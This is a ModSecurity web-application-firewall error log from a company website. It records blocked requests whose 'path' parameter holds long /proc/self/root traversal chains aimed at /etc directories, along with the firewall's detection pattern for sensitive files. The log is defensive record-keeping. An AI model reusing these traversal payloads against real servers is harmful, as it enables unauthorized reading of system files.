[Wed Mar 18 05:55:15.663283 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:47420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoc-yqAr6etmhZHNqJ2QAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:17.075212 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:47430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpodeoXxyEfFpUF8f86_wAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:18.431197 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:47440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpodsdf6f5d65gmYZSghQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:19.794911 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:43146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpod-oXxyEfFpUF8f87AgAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:21.235456 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:43162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoedY0UrI5A3LftIxlOQAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:22.523528 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:43174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoesdf6f5d65gmYZSgiQAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:23.846187 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:43184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoe_u8EFLIOrSqIpvUPQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:25.215987 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:43188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpofSmAPhZkrhU8w4k8-QAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:26.556588 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:43204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpofgkwaGbbGflqUZDfcQAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:27.954442 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:43218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpof8df6f5d65gmYZSgjAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:29.272319 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:43230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpogda6ubjKNq_cu4ZkUQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:30.551323 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:38530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpogimAPhZkrhU8w4k8-gAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:31.834901 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:38544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpog9a6ubjKNq_cu4ZkVgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:33.183332 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:38560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpohQkwaGbbGflqUZDfcgAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:35.891727 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:38562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoh9Y0UrI5A3LftIxlPwAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:37.272990 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:38568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoiSmAPhZkrhU8w4k8_gAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:38.653541 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:38580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoivu8EFLIOrSqIpvUQwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:39.635020 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:32896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoi-w_le52K8_3pV2vYAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:55:40.510093 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:59264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpojMdf6f5d65gmYZSgkQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:42.951744 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:59266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpojsdf6f5d65gmYZSglQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:43.171904 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:49124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoj-oXxyEfFpUF8f87CwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
